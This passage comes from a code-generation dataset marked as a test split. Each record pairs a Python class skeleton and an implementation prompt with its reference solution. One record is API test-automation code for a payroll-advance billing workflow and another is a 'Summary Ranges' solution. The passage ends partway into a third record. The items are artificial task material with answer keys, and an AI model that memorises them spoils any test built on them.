None:\n self.get_ent(Entname)\n EntId = self.entid\nelse:\n EntId = -9999\nif Operator is None:\n Operator = self.Name\nif agentname is None:\n SrceSpId = -9999\nelse:\n SrceSpId = self.get_agent(agentname)\nreq = self.create_api(WeekBill_Select, BeginDt=BeginDt, EndDt=EndDt, BillWeeklyBatchId=-9999, EntId=EntId, SrceSpId=SrceSpId, BillAudit=BillAudit, BillSrce=-9999, Operator=Operator, TrgtSpId=-9999, RecordIndex=0, RecordSize=10)\nprint(req)\nprint(req.json())\nself.billid = req.json()['Data']['RecordList'][0]['BillWeeklyBatchId']\nreturn self.billid", "req = {}\nbillid = self.select_weekbill(agentname=agentname)\nif status == 1:\n req = self.create_api(WeekBill_Confirm, BillWeeklyBatchId=billid)\nelif status == 2:\n req = self.create_api(WeekBill_UnConfirm, BillWeeklyBatchId=billid)\nresult = req.json()['Desc']\nreturn result"], "bodies_text": "<|body_start_0|>\n req = self.create_api(get_agent, CoopSts=1, RecordIndex=0, RecordSize=9999)\n agentlist = req.json()['Data']['RecordList']\n self.agentid = None\n for i in range(len(agentlist)):\n if agentname == agentlist[i]['LaborName']:\n self.agentid = agentlist[i]['SpId']\n return self.agentid\n<|end_body_0|>\n\n<|body_start_1|>\n print(entname)\n req = self.create_api(GetPaySalaryEntList_Api, CoopSts=1, RecordIndex=0, RecordSize=9999)\n print(req.json())\n entlist = req.json()['Data']['RecordList']\n for i in range(len(entlist)):\n try:\n if entname == entlist[i]['EntShortName']:\n self.entid = entlist[i]['EntId']\n print(type(self.entid))\n except Exception as e:\n print(e, '未找到标准企业', entname)\n return self.entid\n<|end_body_1|>\n\n<|body_start_2|>\n self.SettleBeginDate = SettleBeginDate\n self.SettleEndDate = SettleEndDate\n edit_exc(t1=name, t2=idcadnum, t3=workcard, t4=workdate, t5=workstatus, t7=workday)\n alimport = AlImport()\n alimport.login(self.login_phone)\n alimport.ali_import(myLocalFile=myLocalFile_advance, myObjectName=myObjectName_advance)\n self.get_ent(entname=entname)\n req = self.create_api(url=WeekBillGen_ImportCheck, SheetName='Sheet1', BucketKey=bucketname, EnterpriseID=self.entid, FileName=myObjectName_advance, SettleBeginDate=SettleBeginDate, SettleEndDate=SettleEndDate)\n try:\n BizID = req.json()['Data']['BizID']\n for i in range(5):\n req = self.create_api(WeekBillGen_GetImportCheckResult, BizID=BizID, EnterpriseID=self.entid)\n time.sleep(1)\n if req.json()['Data']['State'] == 2:\n break\n req = self.create_api(WeekBillGen_GenerateBatchByBizID, ImportBizID=BizID, EnterpriseID=self.entid)\n bizid = req.json()['Data']['BizID']\n print(bizid)\n for i in range(5):\n req = self.create_api(WeekBillGen_GetGenerateBatchResult, BizID=bizid, EnterpriseID=self.entid)\n time.sleep(1)\n if req.json()['Data']['State'] == 2:\n break\n except Exception as e:\n print(e, req.json())\n<|end_body_2|>\n\n<|body_start_3|>\n if BeginDt is None or EndDt is None:\n BeginDt = self.SettleBeginDate\n EndDt = self.SettleEndDate\n if Entname is not None:\n self.get_ent(Entname)\n EntId = self.entid\n else:\n EntId = -9999\n if Operator is None:\n Operator = self.Name\n if agentname is None:\n SrceSpId = -9999\n else:\n SrceSpId = self.get_agent(agentname)\n req = self.create_api(WeekBill_Select, BeginDt=BeginDt, EndDt=EndDt, BillWeeklyBatchId=-9999, EntId=EntId, SrceSpId=SrceSpId, BillAudit=BillAudit, BillSrce=-9999, Operator=Operator, TrgtSpId=-9999, RecordIndex=0, RecordSize=10)\n print(req)\n print(req.json())\n self.billid = req.json()['Data']['RecordList'][0]['BillWeeklyBatchId']\n return 
self.billid\n<|end_body_3|>\n\n<|body_start_4|>\n req = {}\n billid = self.select_weekbill(agentname=agentname)\n if status == 1:\n req = self.create_api(WeekBill_Confirm, BillWeeklyBatchId=billid)\n elif status == 2:\n req = self.create_api(WeekBill_UnConfirm, BillWeeklyBatchId=billid)\n result = req.json()['Desc']\n return result\n<|end_body_4|>\n", "class_docstring": "", "class_name": "AdvanceManage", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AdvanceManage:\n\n def get_agent(self, agentname):\n \"\"\"获取来源id :param agentname: 来源名称 :return: self.agentid 来源id\"\"\"\n <|body_0|>\n\n def get_ent(self, entname):\n \"\"\"获取标准企业id :param entname: 标准企业名称 :return: self.entid 标准企业id\"\"\"\n <|body_1|>\n\n def advance_import(self, entname, SettleBeginDate, name, SettleEndDate, idcadnum, workcard, workdate, workstatus='在职', workday=6):\n \"\"\"# 可预支导入 :param entname: 标准企业名称 必填 :param SettleBeginDate: 预支周期开始日期,必填 :param name:会员名称,必填 :param SettleEndDate:预支周期结束日期,必填 :param idcadnum:会员身份证号码,必填 :param workcard:会员工牌,必填 :param workdate:会员入职日期,必填 :param workstatus:会员在职状态,选填,默认在职 :param workday:上班天数,选填,默认6天 :return:\"\"\"\n <|body_2|>\n\n def select_weekbill(self, agentname=None, BeginDt=None, EndDt=None, BillAudit=1, Entname=None, Operator=None):\n \"\"\"# 查询可预支账单 :param agentname: 来源名称,可选,默认None :param BeginDt:预支周期开始日期,可选,默认None :param EndDt:预支周期结束日期,可选,默认None :param BillAudit:账单审核状态,可选,默认1:待审核,2已审核,3审核不通过 :param Entname: :param Operator: :return:\"\"\"\n <|body_3|>\n\n def audit_weekbill(self, agentname, status=1):\n \"\"\"审核可预支订单 :param agentname: 来源名称,必填 :param status: 审核状态,可选,默认 1:审核通过,2:审核不通过 :return:\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n req = self.create_api(get_agent, CoopSts=1, RecordIndex=0, RecordSize=9999)\n agentlist = req.json()['Data']['RecordList']\n self.agentid = None\n for i in range(len(agentlist)):\n if agentname == agentlist[i]['LaborName']:\n self.agentid = agentlist[i]['SpId']\n return self.agentid\n<|end_body_0|>\n\n<|body_start_1|>\n print(entname)\n req = self.create_api(GetPaySalaryEntList_Api, CoopSts=1, RecordIndex=0, RecordSize=9999)\n print(req.json())\n entlist = req.json()['Data']['RecordList']\n for i in range(len(entlist)):\n try:\n if entname == entlist[i]['EntShortName']:\n self.entid = entlist[i]['EntId']\n print(type(self.entid))\n except Exception as e:\n print(e, '未找到标准企业', entname)\n return self.entid\n<|end_body_1|>\n\n<|body_start_2|>\n self.SettleBeginDate = SettleBeginDate\n self.SettleEndDate = SettleEndDate\n edit_exc(t1=name, t2=idcadnum, t3=workcard, t4=workdate, t5=workstatus, t7=workday)\n alimport = AlImport()\n alimport.login(self.login_phone)\n alimport.ali_import(myLocalFile=myLocalFile_advance, myObjectName=myObjectName_advance)\n self.get_ent(entname=entname)\n req = self.create_api(url=WeekBillGen_ImportCheck, SheetName='Sheet1', BucketKey=bucketname, EnterpriseID=self.entid, FileName=myObjectName_advance, SettleBeginDate=SettleBeginDate, SettleEndDate=SettleEndDate)\n try:\n BizID = req.json()['Data']['BizID']\n for i in range(5):\n req = self.create_api(WeekBillGen_GetImportCheckResult, BizID=BizID, EnterpriseID=self.entid)\n time.sleep(1)\n if req.json()['Data']['State'] == 2:\n break\n req = self.create_api(WeekBillGen_GenerateBatchByBizID, ImportBizID=BizID, EnterpriseID=self.entid)\n bizid = req.json()['Data']['BizID']\n print(bizid)\n for i in range(5):\n req = self.create_api(WeekBillGen_GetGenerateBatchResult, BizID=bizid, 
EnterpriseID=self.entid)\n time.sleep(1)\n if req.json()['Data']['State'] == 2:\n break\n except Exception as e:\n print(e, req.json())\n<|end_body_2|>\n\n<|body_start_3|>\n if BeginDt is None or EndDt is None:\n BeginDt = self.SettleBeginDate\n EndDt = self.SettleEndDate\n if Entname is not None:\n self.get_ent(Entname)\n EntId = self.entid\n else:\n EntId = -9999\n if Operator is None:\n Operator = self.Name\n if agentname is None:\n SrceSpId = -9999\n else:\n SrceSpId = self.get_agent(agentname)\n req = self.create_api(WeekBill_Select, BeginDt=BeginDt, EndDt=EndDt, BillWeeklyBatchId=-9999, EntId=EntId, SrceSpId=SrceSpId, BillAudit=BillAudit, BillSrce=-9999, Operator=Operator, TrgtSpId=-9999, RecordIndex=0, RecordSize=10)\n print(req)\n print(req.json())\n self.billid = req.json()['Data']['RecordList'][0]['BillWeeklyBatchId']\n return self.billid\n<|end_body_3|>\n\n<|body_start_4|>\n req = {}\n billid = self.select_weekbill(agentname=agentname)\n if status == 1:\n req = self.create_api(WeekBill_Confirm, BillWeeklyBatchId=billid)\n elif status == 2:\n req = self.create_api(WeekBill_UnConfirm, BillWeeklyBatchId=billid)\n result = req.json()['Desc']\n return result\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000164", "length_bytes": 6131, "license_type": "no_license", "methods": [{"docstring": "获取来源id :param agentname: 来源名称 :return: self.agentid 来源id", "name": "get_agent", "signature": "def get_agent(self, agentname)"}, {"docstring": "获取标准企业id :param entname: 标准企业名称 :return: self.entid 标准企业id", "name": "get_ent", "signature": "def get_ent(self, entname)"}, {"docstring": "# 可预支导入 :param entname: 标准企业名称 必填 :param SettleBeginDate: 预支周期开始日期,必填 :param name:会员名称,必填 :param SettleEndDate:预支周期结束日期,必填 :param idcadnum:会员身份证号码,必填 :param workcard:会员工牌,必填 :param workdate:会员入职日期,必填 :param workstatus:会员在职状态,选填,默认在职 :param workday:上班天数,选填,默认6天 :return:", "name": "advance_import", "signature": "def advance_import(self, entname, SettleBeginDate, name, SettleEndDate, idcadnum, workcard, workdate, workstatus='在职', workday=6)"}, {"docstring": "# 查询可预支账单 :param agentname: 来源名称,可选,默认None :param BeginDt:预支周期开始日期,可选,默认None :param EndDt:预支周期结束日期,可选,默认None :param BillAudit:账单审核状态,可选,默认1:待审核,2已审核,3审核不通过 :param Entname: :param Operator: :return:", "name": "select_weekbill", "signature": "def select_weekbill(self, agentname=None, BeginDt=None, EndDt=None, BillAudit=1, Entname=None, Operator=None)"}, {"docstring": "审核可预支订单 :param agentname: 来源名称,必填 :param status: 审核状态,可选,默认 1:审核通过,2:审核不通过 :return:", "name": "audit_weekbill", "signature": "def audit_weekbill(self, agentname, status=1)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_001311", "prompt": "Implement the Python class `AdvanceManage` described below.\n\nClass description:\nImplement the AdvanceManage class.\n\nMethod signatures and docstrings:\n- def get_agent(self, agentname): 获取来源id :param agentname: 来源名称 :return: self.agentid 来源id\n- def get_ent(self, entname): 获取标准企业id :param entname: 标准企业名称 :return: self.entid 标准企业id\n- def advance_import(self, entname, SettleBeginDate, name, SettleEndDate, idcadnum, workcard, workdate, workstatus='在职', workday=6): # 可预支导入 :param entname: 标准企业名称 必填 :param SettleBeginDate: 预支周期开始日期,必填 :param name:会员名称,必填 :param SettleEndDate:预支周期结束日期,必填 :param idcadnum:会员身份证号码,必填 :param workcard:会员工牌,必填 :param workdate:会员入职日期,必填 :param workstatus:会员在职状态,选填,默认在职 :param workday:上班天数,选填,默认6天 :return:\n- def select_weekbill(self, agentname=None, BeginDt=None, EndDt=None, BillAudit=1, Entname=None, 
Operator=None): # 查询可预支账单 :param agentname: 来源名称,可选,默认None :param BeginDt:预支周期开始日期,可选,默认None :param EndDt:预支周期结束日期,可选,默认None :param BillAudit:账单审核状态,可选,默认1:待审核,2已审核,3审核不通过 :param Entname: :param Operator: :return:\n- def audit_weekbill(self, agentname, status=1): 审核可预支订单 :param agentname: 来源名称,必填 :param status: 审核状态,可选,默认 1:审核通过,2:审核不通过 :return:", "prompted_full_text": "Implement the Python class `AdvanceManage` described below.\n\nClass description:\nImplement the AdvanceManage class.\n\nMethod signatures and docstrings:\n- def get_agent(self, agentname): 获取来源id :param agentname: 来源名称 :return: self.agentid 来源id\n- def get_ent(self, entname): 获取标准企业id :param entname: 标准企业名称 :return: self.entid 标准企业id\n- def advance_import(self, entname, SettleBeginDate, name, SettleEndDate, idcadnum, workcard, workdate, workstatus='在职', workday=6): # 可预支导入 :param entname: 标准企业名称 必填 :param SettleBeginDate: 预支周期开始日期,必填 :param name:会员名称,必填 :param SettleEndDate:预支周期结束日期,必填 :param idcadnum:会员身份证号码,必填 :param workcard:会员工牌,必填 :param workdate:会员入职日期,必填 :param workstatus:会员在职状态,选填,默认在职 :param workday:上班天数,选填,默认6天 :return:\n- def select_weekbill(self, agentname=None, BeginDt=None, EndDt=None, BillAudit=1, Entname=None, Operator=None): # 查询可预支账单 :param agentname: 来源名称,可选,默认None :param BeginDt:预支周期开始日期,可选,默认None :param EndDt:预支周期结束日期,可选,默认None :param BillAudit:账单审核状态,可选,默认1:待审核,2已审核,3审核不通过 :param Entname: :param Operator: :return:\n- def audit_weekbill(self, agentname, status=1): 审核可预支订单 :param agentname: 来源名称,必填 :param status: 审核状态,可选,默认 1:审核通过,2:审核不通过 :return:\n\n<|skeleton|>\nclass AdvanceManage:\n\n def get_agent(self, agentname):\n \"\"\"获取来源id :param agentname: 来源名称 :return: self.agentid 来源id\"\"\"\n <|body_0|>\n\n def get_ent(self, entname):\n \"\"\"获取标准企业id :param entname: 标准企业名称 :return: self.entid 标准企业id\"\"\"\n <|body_1|>\n\n def advance_import(self, entname, SettleBeginDate, name, SettleEndDate, idcadnum, workcard, workdate, workstatus='在职', workday=6):\n \"\"\"# 可预支导入 :param entname: 标准企业名称 必填 :param SettleBeginDate: 预支周期开始日期,必填 :param name:会员名称,必填 :param SettleEndDate:预支周期结束日期,必填 :param idcadnum:会员身份证号码,必填 :param workcard:会员工牌,必填 :param workdate:会员入职日期,必填 :param workstatus:会员在职状态,选填,默认在职 :param workday:上班天数,选填,默认6天 :return:\"\"\"\n <|body_2|>\n\n def select_weekbill(self, agentname=None, BeginDt=None, EndDt=None, BillAudit=1, Entname=None, Operator=None):\n \"\"\"# 查询可预支账单 :param agentname: 来源名称,可选,默认None :param BeginDt:预支周期开始日期,可选,默认None :param EndDt:预支周期结束日期,可选,默认None :param BillAudit:账单审核状态,可选,默认1:待审核,2已审核,3审核不通过 :param Entname: :param Operator: :return:\"\"\"\n <|body_3|>\n\n def audit_weekbill(self, agentname, status=1):\n \"\"\"审核可预支订单 :param agentname: 来源名称,必填 :param status: 审核状态,可选,默认 1:审核通过,2:审核不通过 :return:\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n req = self.create_api(get_agent, CoopSts=1, RecordIndex=0, RecordSize=9999)\n agentlist = req.json()['Data']['RecordList']\n self.agentid = None\n for i in range(len(agentlist)):\n if agentname == agentlist[i]['LaborName']:\n self.agentid = agentlist[i]['SpId']\n return self.agentid\n<|end_body_0|>\n\n<|body_start_1|>\n print(entname)\n req = self.create_api(GetPaySalaryEntList_Api, CoopSts=1, RecordIndex=0, RecordSize=9999)\n print(req.json())\n entlist = req.json()['Data']['RecordList']\n for i in range(len(entlist)):\n try:\n if entname == entlist[i]['EntShortName']:\n self.entid = entlist[i]['EntId']\n print(type(self.entid))\n except Exception as e:\n print(e, '未找到标准企业', entname)\n return 
self.entid\n<|end_body_1|>\n\n<|body_start_2|>\n self.SettleBeginDate = SettleBeginDate\n self.SettleEndDate = SettleEndDate\n edit_exc(t1=name, t2=idcadnum, t3=workcard, t4=workdate, t5=workstatus, t7=workday)\n alimport = AlImport()\n alimport.login(self.login_phone)\n alimport.ali_import(myLocalFile=myLocalFile_advance, myObjectName=myObjectName_advance)\n self.get_ent(entname=entname)\n req = self.create_api(url=WeekBillGen_ImportCheck, SheetName='Sheet1', BucketKey=bucketname, EnterpriseID=self.entid, FileName=myObjectName_advance, SettleBeginDate=SettleBeginDate, SettleEndDate=SettleEndDate)\n try:\n BizID = req.json()['Data']['BizID']\n for i in range(5):\n req = self.create_api(WeekBillGen_GetImportCheckResult, BizID=BizID, EnterpriseID=self.entid)\n time.sleep(1)\n if req.json()['Data']['State'] == 2:\n break\n req = self.create_api(WeekBillGen_GenerateBatchByBizID, ImportBizID=BizID, EnterpriseID=self.entid)\n bizid = req.json()['Data']['BizID']\n print(bizid)\n for i in range(5):\n req = self.create_api(WeekBillGen_GetGenerateBatchResult, BizID=bizid, EnterpriseID=self.entid)\n time.sleep(1)\n if req.json()['Data']['State'] == 2:\n break\n except Exception as e:\n print(e, req.json())\n<|end_body_2|>\n\n<|body_start_3|>\n if BeginDt is None or EndDt is None:\n BeginDt = self.SettleBeginDate\n EndDt = self.SettleEndDate\n if Entname is not None:\n self.get_ent(Entname)\n EntId = self.entid\n else:\n EntId = -9999\n if Operator is None:\n Operator = self.Name\n if agentname is None:\n SrceSpId = -9999\n else:\n SrceSpId = self.get_agent(agentname)\n req = self.create_api(WeekBill_Select, BeginDt=BeginDt, EndDt=EndDt, BillWeeklyBatchId=-9999, EntId=EntId, SrceSpId=SrceSpId, BillAudit=BillAudit, BillSrce=-9999, Operator=Operator, TrgtSpId=-9999, RecordIndex=0, RecordSize=10)\n print(req)\n print(req.json())\n self.billid = req.json()['Data']['RecordList'][0]['BillWeeklyBatchId']\n return self.billid\n<|end_body_3|>\n\n<|body_start_4|>\n req = {}\n billid = self.select_weekbill(agentname=agentname)\n if status == 1:\n req = self.create_api(WeekBill_Confirm, BillWeeklyBatchId=billid)\n elif status == 2:\n req = self.create_api(WeekBill_UnConfirm, BillWeeklyBatchId=billid)\n result = req.json()['Desc']\n return result\n<|end_body_4|>\n", "revision_id": "7240500e63599033d904ac60b788ce4e8eec8746", "skeleton": "<|skeleton|>\nclass AdvanceManage:\n\n def get_agent(self, agentname):\n \"\"\"获取来源id :param agentname: 来源名称 :return: self.agentid 来源id\"\"\"\n <|body_0|>\n\n def get_ent(self, entname):\n \"\"\"获取标准企业id :param entname: 标准企业名称 :return: self.entid 标准企业id\"\"\"\n <|body_1|>\n\n def advance_import(self, entname, SettleBeginDate, name, SettleEndDate, idcadnum, workcard, workdate, workstatus='在职', workday=6):\n \"\"\"# 可预支导入 :param entname: 标准企业名称 必填 :param SettleBeginDate: 预支周期开始日期,必填 :param name:会员名称,必填 :param SettleEndDate:预支周期结束日期,必填 :param idcadnum:会员身份证号码,必填 :param workcard:会员工牌,必填 :param workdate:会员入职日期,必填 :param workstatus:会员在职状态,选填,默认在职 :param workday:上班天数,选填,默认6天 :return:\"\"\"\n <|body_2|>\n\n def select_weekbill(self, agentname=None, BeginDt=None, EndDt=None, BillAudit=1, Entname=None, Operator=None):\n \"\"\"# 查询可预支账单 :param agentname: 来源名称,可选,默认None :param BeginDt:预支周期开始日期,可选,默认None :param EndDt:预支周期结束日期,可选,默认None :param BillAudit:账单审核状态,可选,默认1:待审核,2已审核,3审核不通过 :param Entname: :param Operator: :return:\"\"\"\n <|body_3|>\n\n def audit_weekbill(self, agentname, status=1):\n \"\"\"审核可预支订单 :param agentname: 来源名称,必填 :param status: 审核状态,可选,默认 1:审核通过,2:审核不通过 :return:\"\"\"\n 
<|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AdvanceManage:\n def get_agent(self, agentname):\n \"\"\"获取来源id :param agentname: 来源名称 :return: self.agentid 来源id\"\"\"\n req = self.create_api(get_agent, CoopSts=1, RecordIndex=0, RecordSize=9999)\n agentlist = req.json()['Data']['RecordList']\n self.agentid = None\n for i in range(len(agentlist)):\n if agentname == agentlist[i]['LaborName']:\n self.agentid = agentlist[i]['SpId']\n return self.agentid\n\n def get_ent(self, entname):\n \"\"\"获取标准企业id :param entname: 标准企业名称 :return: self.entid 标准企业id\"\"\"\n print(entname)\n req = self.create_api(GetPaySalaryEntList_Api, CoopSts=1, RecordIndex=0, RecordSize=9999)\n print(req.json())\n entlist = req.json()['Data']['RecordList']\n for i in range(len(entlist)):\n try:\n if entname == entlist[i]['EntShortName']:\n self.entid = entlist[i]['EntId']\n print(type(self.entid))\n except Exception as e:\n print(e, '未找到标准企业', entname)\n return self.entid\n\n def advance_import(self, entname, SettleBeginDate, name, SettleEndDate, idcadnum, workcard, workdate, workstatus='在职', workday=6):\n \"\"\"# 可预支导入 :param entname: 标准企业名称 必填 :param SettleBeginDate: 预支周期开始日期,必填 :param name:会员名称,必填 :param SettleEndDate:预支周期结束日期,必填 :param idcadnum:会员身份证号码,必填 :param workcard:会员工牌,必填 :param workdate:会员入职日期,必填 :param workstatus:会员在职状态,选填,默认在职 :param workday:上班天数,选填,默认6天 :return:\"\"\"\n self.SettleBeginDate = SettleBeginDate\n self.SettleEndDate = SettleEndDate\n edit_exc(t1=name, t2=idcadnum, t3=workcard, t4=workdate, t5=workstatus, t7=workday)\n alimport = AlImport()\n alimport.login(self.login_phone)\n alimport.ali_import(myLocalFile=myLocalFile_advance, myObjectName=myObjectName_advance)\n self.get_ent(entname=entname)\n req = self.create_api(url=WeekBillGen_ImportCheck, SheetName='Sheet1', BucketKey=bucketname, EnterpriseID=self.entid, FileName=myObjectName_advance, SettleBeginDate=SettleBeginDate, SettleEndDate=SettleEndDate)\n try:\n BizID = req.json()['Data']['BizID']\n for i in range(5):\n req = self.create_api(WeekBillGen_GetImportCheckResult, BizID=BizID, EnterpriseID=self.entid)\n time.sleep(1)\n if req.json()['Data']['State'] == 2:\n break\n req = self.create_api(WeekBillGen_GenerateBatchByBizID, ImportBizID=BizID, EnterpriseID=self.entid)\n bizid = req.json()['Data']['BizID']\n print(bizid)\n for i in range(5):\n req = self.create_api(WeekBillGen_GetGenerateBatchResult, BizID=bizid, EnterpriseID=self.entid)\n time.sleep(1)\n if req.json()['Data']['State'] == 2:\n break\n except Exception as e:\n print(e, req.json())\n\n def select_weekbill(self, agentname=None, BeginDt=None, EndDt=None, BillAudit=1, Entname=None, Operator=None):\n \"\"\"# 查询可预支账单 :param agentname: 来源名称,可选,默认None :param BeginDt:预支周期开始日期,可选,默认None :param EndDt:预支周期结束日期,可选,默认None :param BillAudit:账单审核状态,可选,默认1:待审核,2已审核,3审核不通过 :param Entname: :param Operator: :return:\"\"\"\n if BeginDt is None or EndDt is None:\n BeginDt = self.SettleBeginDate\n EndDt = self.SettleEndDate\n if Entname is not None:\n self.get_ent(Entname)\n EntId = self.entid\n else:\n EntId = -9999\n if Operator is None:\n Operator = self.Name\n if agentname is None:\n SrceSpId = -9999\n else:\n SrceSpId = self.get_agent(agentname)\n req = self.create_api(WeekBill_Select, BeginDt=BeginDt, EndDt=EndDt, BillWeeklyBatchId=-9999, EntId=EntId, SrceSpId=SrceSpId, BillAudit=BillAudit, BillSrce=-9999, Operator=Operator, TrgtSpId=-9999, RecordIndex=0, RecordSize=10)\n print(req)\n 
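# --- Editor's note (not part of the dataset record above) ---
# The advance_import body shown in this record submits an import job and then
# polls a status endpoint up to five times, sleeping one second between tries,
# until the job reports State == 2 (done). A minimal standalone sketch of that
# submit-then-poll pattern follows; wait_until_done and check_job are
# hypothetical stand-ins for the record's create_api(WeekBillGen_*) calls.
import time

def wait_until_done(check_job, biz_id, attempts=5, delay=1.0, done_state=2):
    """Poll check_job(biz_id) until it reports done_state or attempts run out.

    Returns True when the job finished, False on timeout. Mirrors the record's
    fixed-retry loop; a production version would usually raise on timeout.
    """
    for _ in range(attempts):
        state = check_job(biz_id)
        if state == done_state:
            return True
        time.sleep(delay)
    return False

# Example with a fake backend that finishes on the third poll:
_states = iter([0, 1, 2])
assert wait_until_done(lambda _bid: next(_states), biz_id="demo", delay=0.0)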
print(req.json())\n self.billid = req.json()['Data']['RecordList'][0]['BillWeeklyBatchId']\n return self.billid\n\n def audit_weekbill(self, agentname, status=1):\n \"\"\"审核可预支订单 :param agentname: 来源名称,必填 :param status: 审核状态,可选,默认 1:审核通过,2:审核不通过 :return:\"\"\"\n req = {}\n billid = self.select_weekbill(agentname=agentname)\n if status == 1:\n req = self.create_api(WeekBill_Confirm, BillWeeklyBatchId=billid)\n elif status == 2:\n req = self.create_api(WeekBill_UnConfirm, BillWeeklyBatchId=billid)\n result = req.json()['Desc']\n return result\n", "source": "the_stack_v2_python_sparse", "source_path": "common/lib/comm_func/advance_management.py", "source_repo": "yhtnumberone/automatic_test", "split": "test", "star_events_count": 0} {"blob_id": "385ef34a2f14e971caa2756b9ef50679dd9034b2", "bodies": ["length = len(nums)\nans = []\ni = 0\nwhile i < length:\n j = i\n res = str(nums[i])\n while i + 1 < length and nums[i + 1] - nums[i] == 1:\n i += 1\n if i > j:\n res += '->' + str(nums[i])\n ans.append(res)\n i += 1\nreturn ans", "tmp = []\nfor i in nums:\n if not tmp:\n tmp.append([i, i])\n elif i - tmp[-1][1] == 1:\n tmp[-1][1] = i\n else:\n tmp.append([i, i])\nans = []\nfor x, y in tmp:\n if x == y:\n ans.append('{}'.format(x))\n else:\n ans.append('{}->{}'.format(x, y))\nreturn ans"], "bodies_text": "<|body_start_0|>\n length = len(nums)\n ans = []\n i = 0\n while i < length:\n j = i\n res = str(nums[i])\n while i + 1 < length and nums[i + 1] - nums[i] == 1:\n i += 1\n if i > j:\n res += '->' + str(nums[i])\n ans.append(res)\n i += 1\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n tmp = []\n for i in nums:\n if not tmp:\n tmp.append([i, i])\n elif i - tmp[-1][1] == 1:\n tmp[-1][1] = i\n else:\n tmp.append([i, i])\n ans = []\n for x, y in tmp:\n if x == y:\n ans.append('{}'.format(x))\n else:\n ans.append('{}->{}'.format(x, y))\n return ans\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def summaryRanges(self, nums):\n \"\"\":type nums: List[int] :rtype: List[str]\"\"\"\n <|body_0|>\n\n def summaryRanges_O_n(self, nums):\n \"\"\":type nums: List[int] :rtype: List[str]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n length = len(nums)\n ans = []\n i = 0\n while i < length:\n j = i\n res = str(nums[i])\n while i + 1 < length and nums[i + 1] - nums[i] == 1:\n i += 1\n if i > j:\n res += '->' + str(nums[i])\n ans.append(res)\n i += 1\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n tmp = []\n for i in nums:\n if not tmp:\n tmp.append([i, i])\n elif i - tmp[-1][1] == 1:\n tmp[-1][1] = i\n else:\n tmp.append([i, i])\n ans = []\n for x, y in tmp:\n if x == y:\n ans.append('{}'.format(x))\n else:\n ans.append('{}->{}'.format(x, y))\n return ans\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000165", "length_bytes": 1973, "license_type": "no_license", "methods": [{"docstring": ":type nums: List[int] :rtype: List[str]", "name": "summaryRanges", "signature": "def summaryRanges(self, nums)"}, {"docstring": ":type nums: List[int] :rtype: List[str]", "name": "summaryRanges_O_n", "signature": "def summaryRanges_O_n(self, nums)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def summaryRanges(self, nums): :type nums: List[int] :rtype: List[str]\n- def summaryRanges_O_n(self, nums): :type nums: List[int] 
:rtype: List[str]", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def summaryRanges(self, nums): :type nums: List[int] :rtype: List[str]\n- def summaryRanges_O_n(self, nums): :type nums: List[int] :rtype: List[str]\n\n<|skeleton|>\nclass Solution:\n\n def summaryRanges(self, nums):\n \"\"\":type nums: List[int] :rtype: List[str]\"\"\"\n <|body_0|>\n\n def summaryRanges_O_n(self, nums):\n \"\"\":type nums: List[int] :rtype: List[str]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n length = len(nums)\n ans = []\n i = 0\n while i < length:\n j = i\n res = str(nums[i])\n while i + 1 < length and nums[i + 1] - nums[i] == 1:\n i += 1\n if i > j:\n res += '->' + str(nums[i])\n ans.append(res)\n i += 1\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n tmp = []\n for i in nums:\n if not tmp:\n tmp.append([i, i])\n elif i - tmp[-1][1] == 1:\n tmp[-1][1] = i\n else:\n tmp.append([i, i])\n ans = []\n for x, y in tmp:\n if x == y:\n ans.append('{}'.format(x))\n else:\n ans.append('{}->{}'.format(x, y))\n return ans\n<|end_body_1|>\n", "revision_id": "2d5fa4cd696d5035ea8859befeadc5cc436959c9", "skeleton": "<|skeleton|>\nclass Solution:\n\n def summaryRanges(self, nums):\n \"\"\":type nums: List[int] :rtype: List[str]\"\"\"\n <|body_0|>\n\n def summaryRanges_O_n(self, nums):\n \"\"\":type nums: List[int] :rtype: List[str]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def summaryRanges(self, nums):\n \"\"\":type nums: List[int] :rtype: List[str]\"\"\"\n length = len(nums)\n ans = []\n i = 0\n while i < length:\n j = i\n res = str(nums[i])\n while i + 1 < length and nums[i + 1] - nums[i] == 1:\n i += 1\n if i > j:\n res += '->' + str(nums[i])\n ans.append(res)\n i += 1\n return ans\n\n def summaryRanges_O_n(self, nums):\n \"\"\":type nums: List[int] :rtype: List[str]\"\"\"\n tmp = []\n for i in nums:\n if not tmp:\n tmp.append([i, i])\n elif i - tmp[-1][1] == 1:\n tmp[-1][1] = i\n else:\n tmp.append([i, i])\n ans = []\n for x, y in tmp:\n if x == y:\n ans.append('{}'.format(x))\n else:\n ans.append('{}->{}'.format(x, y))\n return ans\n", "source": "the_stack_v2_python_sparse", "source_path": "SourceCode/Python/Problem/00228.Summary Ranges.py", "source_repo": "roger6blog/LeetCode", "split": "test", "star_events_count": 0} {"blob_id": "5fc02428f038e4955491e10646b8ceac2ea10497", "bodies": ["super(MetaLearner, self).__init__()\nself.n_way = n_way\nself.k_shot = k_shot\nself.meta_batchsz = meta_batchsz\nself.beta = 